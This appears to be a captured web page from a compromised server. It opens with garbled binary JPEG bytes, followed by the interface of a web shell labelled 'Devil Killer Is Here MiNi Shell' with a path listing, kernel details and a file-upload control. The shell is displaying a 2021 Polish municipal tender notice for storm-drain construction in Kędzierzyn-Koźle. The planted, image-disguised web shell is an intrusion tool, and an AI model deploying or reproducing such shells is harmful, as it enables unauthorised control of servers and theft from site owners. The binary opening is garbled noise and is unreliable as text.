JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210623/0009139801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00091398 z dnia 2021-06-23</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Uzupełnienie kanalizacji ściekowej na obszarze Gminy - Budowa kanalizacji deszczowej w celu odwodnienia terenu w rejonie budynku przy ul. Modrzejewskiej4 w Kędzierzynie-Koźlu - II POSTĘPOWANIE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kędzierzyn-Koźle - Urząd Miasta</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531412912</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piramowicza 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kędzierzyn-Koźle</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@kedzierzynkozle.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kedzierzynkozle.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Uzupełnienie kanalizacji ściekowej na obszarze Gminy - Budowa kanalizacji deszczowej w celu odwodnienia terenu w rejonie budynku przy ul. Modrzejewskiej4 w Kędzierzynie-Koźlu - II POSTĘPOWANIE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-303b1414-d3ed-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00091398</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001345/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.23 Wykonanie kanalizacji ściekowej na terenie Gminy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.e-propublico.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy<br/>użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającej<br/>podadresemhttps://e-propublico.pl.2. W uzasadnionych przypadkach np. awarii platformy<br/>dopuszczalna jest komunikacja za pośrednictwem poczty elektronicznej na adresy wskazane w SWZ,<br/>z zastrzeżeniem, że ofertę składa się tylko za pośrednictwem platformy e-ProPublico.3.<br/>Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki<br/>korzystania z Platformy określone w Regulaminie zamieszczonym na stronie internetowej https://e-<br/>ProPublico.pl/oraz uznaje go za wiążący.4. Ofertę, wraz ze stanowiącymi jej integralną część<br/>załącznikami, składa się pod rygorem nieważności w formie elektronicznej (podpisaną kwalifikowanym<br/>podpisem elektronicznym)lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym za pośrednictwem Platformy, 5. Szczegółowe informacje o sposobie porozumiewania się<br/>i wymagania formalne dotyczące składanych dokumentów zostały opisano w rozdziale 13 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych<br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119z04.05.2016, str. 1), dalej „RODO”, informuję, że: 1) administratorem Pani/Pana danych osobowych<br/>jest Urząd Miasta Kędzierzyn-Koźle, z siedzibą przy ul. Grzegorza Piramowicza 32, 47-200 Kędzierzyn-<br/>Koźle, adres e-mail: prezydent@kedzierzynkozle.pl, tel. 77/40-50-338.;2) sposób kontaktu<br/>z inspektorem ochrony danych osobowych w Urzędzie Miasta Kędzierzyn-Koźle: 47-200 Kędzierzyn-<br/>Koźle, ul. Grzegorza Piramowicza 32, adres e-mail: inspektor@kedzierzynkozle.pl, tel. 77/40-50-346;3)<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego;4) odbiorcami Pani/Pana danych osobowych<br/>będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8<br/>oraz art. 96 ust. 3 ustawy Pzp, a także Spółka Datacomp Sp. z o.o. z siedzibą w Krakowie (adres: ul.<br/>Gen. Henryka Dąbrowskiego 24, 30-532 Kraków), nr Rejestru KRS 0000193067,jako właściciel<br/>Platformy on-line działającej pod adresem https://e-ProPublico.pl/, na której Zamawiający prowadzi<br/>postępowania o udzielenie zamówienia publicznego;5) Pani/Pana dane osobowe będą przechowywane,<br/>zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dniazakończenia postępowania o udzielenie<br/>zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,okres przechowywania obejmuje cały czas<br/>trwania umowy; zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w<br/>sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie<br/>organizacji i zakresu działania archiwów zakładowych (tj. Dz.U z2011 nr 14, poz. 67 z późn. zm.) teczki<br/>aktowe będą przechowywane w archiwum zakładowym przezokres 5 lat w przypadku dokumentacji<br/>zamówień publicznych oraz 10 lat w przypadku umów zawartychw wyniku postępowania w trybie<br/>zamówień publicznych;6) obowiązek podania przez Panią/Panadanych osobowych bezpośrednio<br/>Pani/Pana dotyczących jest wymogiem ustawowym określonym wprzepisach ustawy Pzp, związanym z<br/>udziałem w postępowaniu o udzielenie zamówienia publicznego;konsekwencje niepodania określonych<br/>danych wynikają z ustawy Pzp; 7) w odniesieniu do Pani/Panadanych osobowych decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pani/Pan: na podstawie art. 15 RODO<br/>prawo dostępu do danych osobowych Pani/Pana dotyczących; w przypadku, gdy wykonanie<br/>obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku,<br/>Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego;na podstawie art. 16 RODO prawo do sprostowania Pani/Pana<br/>danych osobowych (przy czym korzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników);na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (przy czym<br/>prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w<br/>celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwa członkowskiego); -wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO , nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego; -prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, jeśli uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;24.2nie przysługuje Pani/Panu: - w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo<br/>do usunięcia danych osobowych; - prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO;na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. 24.3<br/>Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym<br/>wynikającym z art. 14RODO względem osób fizycznych, których dane przekazane zostaną<br/>Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od<br/>Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń, o których mowa wart. 14 ust. 5 RODO.24.4 Skorzystanie przez osobę, której dane osobowe<br/>dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w<br/>sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp.24.5 W postępowaniu o<br/>udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1<br/>RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.46.2021.AW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest budowa kanalizacji deszczowej w celu odwodnienia terenu w rejonie budynku przy ul. Modrzejewskiej 4 w Kędzierzynie-Koźlu<br/>2.	Zakres zamówienia obejmuje:<br/>1)	Wykonanie kanału deszczowego wraz ze studniami i wpustami ulicznymi z osadnikami<br/>2)	Demontaż istniejącego odwodnienia<br/>3)	Wykonanie wylotu do rzeki Kłodnicy<br/>4)	Wykonanie przejścia pod drogą powiatową (ul. Nowowiejska) metodą przewiertu<br/>5)	Wycinka drzew i krzewów<br/>6)	Wykonanie nasadzeń zastępczych<br/>7)	Wymiana włazów na istniejącej kanalizacji sanitarnej w obrębie inwestycji<br/> <br/>3.	Wymóg zatrudnienia na podstawie umowy o pracę. Na podstawie 95 ust. 1 ustawy Pzp. Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku pracy, osób wykonujących następujące czynności związane z realizacją zamówienia:<br/>	roboty kanalizacyjne<br/>Sposób weryfikacji zatrudnienia, uprawnienia zamawiającego w zakresie kontroli oraz sankcje <br/>z tytułu niespełnienia wymagań zostały określone w części II SWZ – Projektowane postanowienia umowy.<br/> <br/>4.	Szczegółowy opis przedmiotu zamówienia określają m.in. Projektowane postanowienia umowy, oraz następujące załączniki zamieszczone na stronie internetowej prowadzonego postępowania stanowiące integralną częścią SWZ:<br/>1)	Dokumentacja projektowa sporządzona przez: Usługi Projektowe Inżynieria Sanitarna Barbara Skowrońska – Petek, ul. Al. Partyzantów 14A/1, 47-224 Kędzierzyn-Koźle </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232410-9 - Roboty w zakresie kanalizacji ściekowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">140 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium: Cena całkowita brutto [zł]Liczba punktów = (Cmin/Cof) * 60<br/>pktgdzie: - Cmin – najniższa cena spośród wszystkich ofert - Cof – cena badanej oferty Kryterium:<br/>Okres gwarancji (miesiące)- min. 36 max oceniany 60 miesięcy Liczba punktów = (Gof/G max ) * 100 *<br/>waga gdzie: - Gof – gwarancja badanej oferty - G max - najdłuższy spośród wszystkich okres<br/>gwarancji Uwagi:Termin gwarancji należy podać w miesiącach.W przypadku, gdy Wykonawca określi<br/>okres gwarancji dłuższy niż 60 miesięcy to Zamawiający do obliczeń będzie przyjmował okres<br/>wynoszący 60 miesięcy, natomiast umowa zostanie zawarta z uwzględnieniem długości okresu<br/>gwarancji zadeklarowanego w ofercie. Zamawiający odrzuci oferty, które będą zakładały gwarancję krótszą niż 36 miesięcy. W przypadku nie podania w ofercie okresu gwarancji Zamawiający odrzuci<br/>ofertę. Pozostałe oferty otrzymają liczbę punktów wynikającą z liniowej zależności</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa. Wykonawca musi wykazać, że nie wcześniej niż w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy - w tym okresie, wykonał należycie:robotę/roboty w zakresie wykonania kanalizacji<br/>sanitarnej/ deszczowej na wartość łączną min. 500 000,00 zł,Wymagane doświadczenie można<br/>wykazać maksymalnie w ramach dwóch zamówień.Do przeliczenia wszystkich wartości<br/>finansowych, a występujących w innych walutach niż PLN Wykonawca zastosuje średni kurs<br/>Narodowego Banku Polskiego (NBP) opublikowany w dniu ukazania się ogłoszenia o niniejszym<br/>zamówieniu na stronie internetowej Zamawiającego. Średnie kursy walut dostępne są na stronie<br/>internetowej Narodowego Banku Polskiego pod następującym adresem: http://www.nbp.pl/.II.<br/>Wykonawca wskaże osoby do wykonania niniejszego zamówienia wraz z informacjami na temat<br/>ich wykształcenia, kwalifikacji zawodowych, doświadczenia, a także zakresu wykonywanych<br/>przez nią czynności, która spełnia następujące warunki:1) jedna osoba, która będzie pełniła<br/>funkcję Kierownika budowy posiadająca - uprawnienia do sprawowania samodzielnych funkcji<br/>technicznych w budownictwie tj.: do kierowania robotami budowlanymi w specjalności<br/>instalacyjnej zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych2) jedna<br/>osoba, która będzie pełniła funkcję Kierownika robót posiadająca - uprawnienia do sprawowania<br/>samodzielnych funkcji technicznych w budownictwie, tj.: do kierowania robotami budowlanymi w<br/>specjalności drogowej.Zamawiający dopuszcza możliwość łączenia ww. funkcji spośród<br/>wskazanych powyżej osób, pod warunkiem posiadania przez te osoby wymaganych uprawnień<br/>budowlanych. Wskazane wyżej uprawnienia budowlane powinny być wydane na podstawie:-Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019r. w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. z 2019r. poz. 831), lub- odpowiadające im ważne uprawnienia w zakresie<br/>odpowiadającym powyższym wymaganiom, wydane na podstawie wcześniej obowiązujących<br/>przepisów Ilekroć powyżej mowa jest o uprawnieniach, to w przypadku osób będących<br/>obywatelami krajów członkowskich Unii Europejskich oznacza to decyzję w sprawie uznania<br/>wymaganych kwalifikacji do wykonywania w Rzeczypospolitej Polskiej samodzielnych funkcji<br/>technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia – zgodnie z<br/>właściwymi przepisami, w szczególności: z ustawą o zasadach uznania kwalifikacji zawodowych<br/>nabytych w krajach członkowskich Unii Europejskiej z dnia 22 grudnia 2015r. (tekst jednolity Dz.<br/>U. z 2018r., poz. 2272 ze zm.) oraz Ustawą z dnia 15 grudnia 2000r. o samorządach<br/>zawodowych architektów, inżynierów budownictwa (tekst jednolity Dz. U. z 2019 roku, poz. 1117<br/>ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem<br/>najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych:1) wykaz osób, skierowanych przez wykonawcę do realizacji<br/>zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami– zakresie niezbędnym do wykazania spełnienia warunku udziału w postępowaniu (wzór<br/>stanowi załącznik nr 6 do SWZ);2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – w<br/>zakresie niezbędnym do wykazania spełnienia warunku udziału w postępowaniu (wzór stanowi<br/>załącznik nr 7 do SWZ)</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty należy złożyć:1) Formularz ofertowy sporządzony zgodnie ze wzorem<br/>stanowiącym załącznik nr 1 do SWZ, 2) Oświadczenie o niepodleganiu wykluczeniu oraz<br/>spełnieniu warunków udziału w postępowaniu na podstawie art. 125 ust. 1, (wzór oświadczenia<br/>stanowi załącznik nr 2do SWZ) Oświadczenie składają odrębnie: a) wykonawca/każdy spośród<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia.b) podmiot 